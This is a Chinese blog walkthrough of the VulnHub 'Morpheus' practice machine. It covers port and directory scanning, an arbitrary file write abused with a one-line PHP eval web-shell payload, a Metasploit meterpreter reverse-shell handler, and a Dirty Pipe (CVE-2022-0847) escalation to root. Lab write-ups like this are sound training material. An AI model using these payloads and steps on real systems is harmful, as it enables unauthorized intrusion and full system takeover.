Vulnhub - Morpheus

希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog

Morpheus 靶机下载地址:Matrix-Breakout: 2 Morpheus ~ VulnHub

0x01 信息收集

Nmap扫描目标主机,发现开放22、80、81端口,分别运行OpenSSH 8.4p1、Apache httpd 2.4.51、Nginx 1.18.0服务。

访问80端口页面是一个Notice。Wappalyzer显示编程语言为PHP,操作系统为Debian。

访问81端口提示需要认证,如下:

 dirbuster扫描80端口网站目录,访问发现/graffiti.php,是一个类似评论的页面。

dirbuster -u "http://192.168.196.135/" -e php -r /root/DirBuster-Report-192.168.196.135.txt -l /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

 

0x02 Web漏洞利用 - 任意文件写入

随意评论111,BurpSuite抓包得到:message=111&file=graffiti.txt

这里存在任意文件写入漏洞,修改payload:message=<?php eval($_POST["pass"]);?>&file=shell.php

message=<?php eval($_POST["pass"]);?>&file=shell.php

哥斯拉连接成功,拿到Web权限www-data

0x03 内核提权 - Dirty Pipe(CVE-2022-0847)

利用哥斯拉PMeterpreter模块将Shell反弹到MSF以便后续操作

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > run

上传内核漏洞辅助探测脚本linux-exploit-suggester.sh至目标主机/tmp目录下,给予执行权限执行。

辅助项目下载地址:https://github.com/The-Z-Labs/linux-exploit-suggester

得知系统为Debian 11,内核版本为5.10.0,检测到[CVE-2022-0847] DirtyPipe,并给出了EXP下载地址,但MSF收集有这个漏洞,直接搜索即可。

 

 MSF搜索CVE-2022-0847,使用payload:exploit/linux/local/cve_2022_0847_dirtypipe

设置session并run,成功拿下root权限,随后得到/root目录下的flag。

相关推荐

  1. matrix-breakout-2-morpheus 靶场 练习思路

    2024-03-17 23:30:01       63 阅读
  2. vulnhub靶机Phineas

    2024-03-17 23:30:01       64 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-17 23:30:01       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-17 23:30:01       106 阅读
  3. 在Django里面运行非项目文件

    2024-03-17 23:30:01       87 阅读
  4. Python语言-面向对象

    2024-03-17 23:30:01       97 阅读

热门阅读

  1. QT 状态机的使用

    2024-03-17 23:30:01       42 阅读
  2. 折半搜索 笔记

    2024-03-17 23:30:01       44 阅读
  3. [小程序开发] 组件生命周期

    2024-03-17 23:30:01       44 阅读
  4. 力扣爆刷第97天之hot100五连刷71-75

    2024-03-17 23:30:01       36 阅读
  5. 克服大型语言模型幻觉使用检索增强生成(RAG)

    2024-03-17 23:30:01       38 阅读
  6. Leetcode 1046. 最后一块石头的重量

    2024-03-17 23:30:01       41 阅读
  7. c# 的ref 和out

    2024-03-17 23:30:01       45 阅读
  8. 安卓UI面试题 45-50

    2024-03-17 23:30:01       41 阅读
  9. bootstrap精选模板tabler下载

    2024-03-17 23:30:01       40 阅读
  10. C#+datax实现定时增量同步

    2024-03-17 23:30:01       51 阅读
  11. Git的一些基础命令

    2024-03-17 23:30:01       50 阅读
  12. DELETE、TRUNCATE 和 DROP 在MySQL中的区别及使用示例

    2024-03-17 23:30:01       40 阅读
  13. 【leetcode热题】比较版本号

    2024-03-17 23:30:01       41 阅读